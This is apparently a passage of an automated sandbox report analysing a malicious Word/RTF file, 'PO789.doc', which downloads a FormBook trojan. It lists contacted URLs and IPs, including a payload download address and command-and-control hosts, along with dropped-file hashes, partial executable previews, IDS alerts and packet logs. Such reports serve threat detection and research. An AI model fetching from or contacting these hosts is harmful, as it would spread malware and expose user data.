https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM | explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmp | false | | high
https://github.com/proviq/lusrmgr | medicomsh78694.exe | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp | false | | high
http://p.yusukekamiyamane.com/ | medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | false | | high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://github.com/proviq/lusrmgr/ | medicomsh78694.exe | false | | high
http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp | false | | high
http://www.small-icons.com/packs/16x16-free-application-icons.htm | medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://splashyfish.com/icons/ | medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea | explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp | false | | high
http://www.msn.com/?ocid=iehp01l | explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msn.com/?ocid=iehp | explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp | false | | high
http://www.msn.com/de-de/?ocid=iehp | explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp | false | | high
http://www.gnome.org/ | medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | false | | high
http://www.fatcow.com/free-icons/ | medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.512214030.00000000002C7000.00000004.00000020.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://led24.de/iconset/ | medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.%s.comPA | explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.427812098.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                                                          Contacted IPs


                                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
2.58.149.41 | peak-tv.tk | Netherlands | 395800 | GBTCLOUDUS | true
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | muzicalbox.com | United States | 15169 | GOOGLEUS | false
109.94.209.123 | www.extraordinarymiracle.com | Russian Federation | 202376 | ARVID-LOGICUMEE | true
91.195.240.13 | www.realstakepool.com | Germany | 47846 | SEDO-ASDE | true

                                                                          General Information

                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                          Analysis ID:552782
                                                                          Start date:13.01.2022
                                                                          Start time:18:16:09
                                                                          Joe Sandbox Product:CloudBasic
                                                                          Overall analysis duration:0h 12m 44s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:light
                                                                          Sample file name:PO789.doc
                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:10
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:1
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • HDC enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.expl.evad.winDOC@9/9@6/5
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HDC Information:
                                                                          • Successful, ratio: 14.9% (good quality ratio 13.9%)
                                                                          • Quality average: 68.4%
                                                                          • Quality standard deviation: 29.6%
                                                                          HCA Information:
                                                                          • Successful, ratio: 96%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          Cookbook Comments:
                                                                          • Adjust boot time
                                                                          • Enable AMSI
                                                                          • Found application associated with file extension: .doc
                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                          • Attach to Office via COM
                                                                          • Scroll down
                                                                          • Close Viewer
                                                                          Warnings:
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                                          • TCP Packets have been reduced to 100
• Not all processes were analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                          Simulations

                                                                          Behavior and APIs

Time | Type | Description
18:16:18 | API Interceptor | 36x Sleep call for process: EQNEDT32.EXE modified
18:16:20 | API Interceptor | 86x Sleep call for process: medicomsh78694.exe modified
18:16:44 | API Interceptor | 138x Sleep call for process: msdt.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          No context

                                                                          Domains

                                                                          No context

                                                                          ASN

                                                                          No context

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:downloaded
                                                                          Size (bytes):707072
                                                                          Entropy (8bit):7.1557818019777
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Y+xYKKAB5ADeIVvcDK8OpvlmXsC2GxfjpWHpxFvMUXvoHVgDaiYCpslXGqoohdZy:Y+bYeIVwl5dCWdloqXkz53iA55suuI
                                                                          MD5:8807C2E0F2973A22812AF6E61BA72667
                                                                          SHA1:20BDCA62A8D0C98F8DB2C9FF1E3AB13DC4849514
                                                                          SHA-256:4228CCE8278F840721D9F04FEA140B942C14D45938D07C1FA36A29712DDA441C
                                                                          SHA-512:05AF426C3133B5B71F74E6754C139ACD8BAA6C3A492719C223403C9F859CDF9EFE12739D8B35C9CB2E4126FA54080E91894AB6A40E417894EF14A218B88FA527
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 34%
                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                          IE Cache URL:http://peak-tv.tk/medicomzx.exe
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................$...`#............................................("...*&..(#....*.s$........s%........s&........s'........s(........*...0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0..<........~.....(......,!r...p.....(/...o0...s1............~.....+..*.0...........~.....+..*".......*.0..&........(....r%..p~....o2...(3.....t$....+..*Vs....(4...t.........*..(5...*.0..........
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                          Category:dropped
                                                                          Size (bytes):5632
                                                                          Entropy (8bit):4.123128557938953
                                                                          Encrypted:false
                                                                          SSDEEP:96:SB9fMP/FyI+brWXL9TQ9IJp0Mhrq/2BpWYjuGFkZu:SB9UP/SrWXLiWaMYOPOF
                                                                          MD5:6D550004A108E472ACB60AFA74AECBAD
                                                                          SHA1:A43A215E06FEAA84FD26BBB00439A041448B484A
                                                                          SHA-256:5B58844E1C55D5D069C4E7D10EF267AD2F0C93E239265FD8FB51930CED238C6C
                                                                          SHA-512:3CFD4B10E88C6CA7B31AA12BAC4B2642DFC50B426A0A597D2A836578A3A3C4FD4F90756A3FCE2AC43A52AB1E46FA356D7BA3F7AA0962B0D024131504A7CF1E8A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1024
                                                                          Entropy (8bit):0.05390218305374581
                                                                          Encrypted:false
                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                          Malicious:false
                                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A1ACA359-D73C-4E90-86E8-AE0089CF8F67}.tmp
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):9216
                                                                          Entropy (8bit):3.481183177856214
                                                                          Encrypted:false
                                                                          SSDEEP:192:o3uVHzr2R9THXsibKVEbyKbQTjKiqeOCs0XqK2WP1vTOkpc76EnZ:o+VzrkBNPecQTee/aK2+OEiZ
                                                                          MD5:1ED77075EA7EA8E9B6386E63B1F8F682
                                                                          SHA1:7F3E9A5B4FEC84D3298D32A6BB1D8A8E89866C24
                                                                          SHA-256:AB2DDDC94896F581777EA638395F5FAC4F42F368AEC3932BDF1EDA21328B5866
                                                                          SHA-512:E58451151D174E46965E7DD18D785A273571BE2CAADC2F86C97E695EBD7C2AD4967D8C15DA14C7705023E64B4B330201A374080F759C6D9A24B3227AD083699C
                                                                          Malicious:false
                                                                          Preview: ..%.^.@.+.*.&.7.8.-.[./.?._.?.,.0...6.3.8.<.~.-.6.?.%.'.;.[...1.,.#.3.5.-.4.#.^.`...?.?...@.[.3._...4.,.3.3.&.1.$./.9.*.].'.7.?.*.?.%.~.+.6.?.0...@.!.?._.'.6.).5.-.>.?.$.].~.+.:.;.*.,...;.?.../.1.&.4.6.|.'._.+.].?.?.!.`.?.[.+.*.;.=.@.?.?.|.'.?.7.9.'.%.+.;.%.?.=.~.'.|.,.+...$.6.?.?.%.*.1.(.$.9.?.,.`.?.,.;...;.].&.%.*.!._.5.6.6.=.#.#.@._.|.~.+./.%.5.$.?.%.$.1.9.0.`.%.'.3.0.,.+.%.7.=.|...[.:...,.?.].1.8.[.<.1.~.>.)...?.>.3.#.*.,...?.`.4.1.@.2.7.?.3...#.;.@.;.2._.?.6.0.1.4.~.#.%.@.0.+.(.>.5.0.>.4.-.=.'.;...&.#.7.&.:.4.=.&.4...!.?.8.*.]._.:.>.2.%.*.2...>.3.|...6.=.9.%.:.6.-.`.`.$.+...?.$...3.;.#./.9.8...-.!.8.+.2.^.:.8.;.?.?./...7.%.....<.?.^.~.3.7.~.(.@.,.;.;.2.'.#.5.?.$.?.&.6.>.(.<.'._._.`.,.+.[.-.;.'.*.2...[.....>.?.5.$...1.:.?.?.!.5.0.@.).[.>._.&.=.?.?.8...;.`.0.-._.`...*.?._.!.^.%...&...?.8.%.+.;.-...`.3._.3...?.?.^...'.].>.3.$.@.?.*.?.?...?.,.`.5.$.^.?.?.$._.?...#./.>.%./.!.9.^.|.@.;.=.8.!.(.9.4...%.8.].[.?.?.?.!.3.[.1.-.>.>.7.?.@.2.^.+.+...?.7.<.3.-.].[.1.8.$.?.,.0.^.:.=.?.%.5.*.).8.
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO789.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Fri Jan 14 01:16:16 2022, length=21489, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):985
                                                                          Entropy (8bit):4.502552260196471
                                                                          Encrypted:false
                                                                          SSDEEP:12:81exRgXg/XAlCPCHaXeBhB/OW9qX+WvvTicvbp04loDtZ3YilMMEpxRljK2QMTd+:8an/XTuzLINGeHoDv3qSAQd7Qy
                                                                          MD5:8BDC5B1FDC8B42BFCED301566877791E
                                                                          SHA1:D296ED0B91FA1FD37358AD09E026DD88C1270962
                                                                          SHA-256:65F2C698BA65C4FD314A4470EC3940F5EA2CD6E1C19AC315D0DF1932FEE46F3C
                                                                          SHA-512:81058FD9BAE0CED6E9EDAE6C25AB053FAEA2347357B2316B0DE6A25A6CE8EDE5C0AC8F6A2B3B527EE775140FF50FCBBA22223C1E4C5A712B315D0B6C81B53659
                                                                          Malicious:false
                                                                          Preview: L..................F.... .....?.....?...........S...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2..S...T.. .PO789.doc.@.......S ..S .*.........................P.O.7.8.9...d.o.c.......s...............-...8...[............?J......C:\Users\..#...................\\745481\Users.user\Desktop\PO789.doc. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.7.8.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......745481..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.643794821759313
                                                                          Encrypted:false
                                                                          SSDEEP:3:bDuMJlt+jomX1gHjov:bCmQIDy
                                                                          MD5:DAE12E95560EA2CA4F86AC4515A68F33
                                                                          SHA1:5A1ACBDF73F62480BEFE51B3DF654745BF6AAE74
                                                                          SHA-256:141FA7A3959432D83CCA3841FDDFDA6108B2BCA2FFAED58CE4146A9D2BF898AD
                                                                          SHA-512:152A5EA111E388591175CC2386DAE6ED8CF7B4CCCED0B73339142FAA41122B94D64098F9F8312B7B6BA2078609438DCA5F617773C68310A45753F9E7D2B54381
                                                                          Malicious:false
                                                                          Preview: [folders]..Templates.LNK=0..PO789.LNK=0..[doc]..PO789.LNK=0..
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                          C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):707072
                                                                          Entropy (8bit):7.1557818019777
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Y+xYKKAB5ADeIVvcDK8OpvlmXsC2GxfjpWHpxFvMUXvoHVgDaiYCpslXGqoohdZy:Y+bYeIVwl5dCWdloqXkz53iA55suuI
                                                                          MD5:8807C2E0F2973A22812AF6E61BA72667
                                                                          SHA1:20BDCA62A8D0C98F8DB2C9FF1E3AB13DC4849514
                                                                          SHA-256:4228CCE8278F840721D9F04FEA140B942C14D45938D07C1FA36A29712DDA441C
                                                                          SHA-512:05AF426C3133B5B71F74E6754C139ACD8BAA6C3A492719C223403C9F859CDF9EFE12739D8B35C9CB2E4126FA54080E91894AB6A40E417894EF14A218B88FA527
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 34%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................$...`#............................................("...*&..(#....*.s$........s%........s&........s'........s(........*...0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0..<........~.....(......,!r...p.....(/...o0...s1............~.....+..*.0...........~.....+..*".......*.0..&........(....r%..p~....o2...(3.....t$....+..*Vs....(4...t.........*..(5...*.0..........
                                                                          C:\Users\user\Desktop\~$PO789.doc
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:true
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type: Rich Text Format data, unknown version
Entropy (8bit): 3.6305852926898945
TrID:
• Rich Text Format (5005/1) 55.56%
• Rich Text Format (4004/1) 44.44%
File name: PO789.doc
File size: 21489
MD5: 6c28e31d32e97db724188025636ac25e
SHA1: c5818d1883785293dfab00d2c1389b82cc74ad60
SHA256: c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
SHA512: a22a65663670274098a9259314e1789b97d8ca1a11e8758eb08ee673d19755bf836f2346167dfaec5839a2ab77ff45c922e792b609c17c3c92d771c5d4af8463
SSDEEP: 384:d5vSln/51N+CYmIX1GeQC9/x7U3AJul04:d5vSln/N+LGeQCmwue4
File Content Preview: {\rtf872.%^@+*&78-[/?_?,0.638<~-6?%';[.1,#35-4#^`.??.@[3_.4,33&1$/9*]'7?*?%~+6?0.@!?_'6)5->?$]~+:;*,.;?./1&46|'_+]??!`?[+*;=@??|'?79'%+;%?=~'|,+.$6??%*1($9?,`?,;.;]&%*!_566=##@_|~+/%5$?%$190`%'30,+%7=|.[:.,?]18[<1~>).?>3#*,.?`41@27?3.#;@;2_?6014~#%@0+(>50

File Icon

Icon Hash: e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id  Start  Format ID  Format  Classname  Datasize  Filename  Sourcepath  Temppath  Exploit
0000010C4hno
100001073hno

                                                                          Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
01/13/22-18:18:34.850775  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49168      23.227.38.74    192.168.2.22
01/13/22-18:18:53.504983  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22    34.102.136.180
01/13/22-18:18:53.504983  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22    34.102.136.180
01/13/22-18:18:53.504983  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22    34.102.136.180
01/13/22-18:18:53.620393  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49170      34.102.136.180  192.168.2.22
01/13/22-18:19:03.995932  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22    91.195.240.13
01/13/22-18:19:03.995932  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22    91.195.240.13
01/13/22-18:19:03.995932  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22    91.195.240.13

                                                                          Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jan 13, 2022 18:17:00.130606890 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.157335997 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.157475948 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.157764912 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.184355974 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184818029 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184843063 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184859991 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184878111 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184895039 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184906960 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184921980 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.184923887 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184942007 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184943914 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.184954882 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.184958935 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184976101 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.184998035 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.185000896 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.185004950 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.194046974 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211577892 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211611986 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211626053 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211641073 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211658955 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211677074 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211694002 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211710930 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211728096 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211735964 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211745024 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211757898 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211760998 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211760998 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211777925 CET  80           49167      2.58.149.41   192.168.2.22
Jan 13, 2022 18:17:00.211785078 CET  49167        80         192.168.2.22  2.58.149.41
Jan 13, 2022 18:17:00.211795092 CET  80           49167      2.58.149.41   192.168.2.22
